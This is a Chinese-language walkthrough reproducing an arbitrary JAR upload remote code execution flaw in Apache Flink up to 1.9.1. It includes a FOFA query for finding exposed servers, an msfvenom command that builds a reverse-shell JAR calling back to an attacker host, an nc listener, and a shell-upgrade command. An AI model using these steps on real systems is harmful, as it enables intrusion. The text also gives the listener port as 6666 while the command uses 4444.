0%

Apache Flink任意Jar包上传RCE

漏洞描述


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。

有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞。攻击者只需要自己定制一个恶意jar上传,即可达到攻击目的。


影响版本


Apache Flink <= 1.9.1(最新版本)


FOFA语句

1
2
FOFA 语句
app="Apache-Flink" && country="CN"

image-20210809093851114

环境搭建

镜像下载地址:

1
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

下载好后进入bin文件夹。执行chmod +x *,再执行./start-cluster.sh

image-20210809094032637

访问http://ip:8081可看到环境页面:

image-20210809094302926

漏洞复现

1.在kali中使用msfvenom生成jar包;

1
msfvenom -p java/shell_reverse_tcp LHOST=192.168.40.132 LPORT=4444 -f jar >msfshell.jar

image-20210809094432691

2.在kali中使用nc监听6666端口;

1
nc -lvvp 4444

image-20210809094515194

3.上传生成的jar包

image-20210809094615504

image-20210809094644864

点击Submit后,成功反弹shell;

image-20210809094735187

获取到的shell非正常交互界面,可执行:

1
SHELL=/bin/bash script -q /dev/null

image-20210809094810139

欢迎关注我的其它发布渠道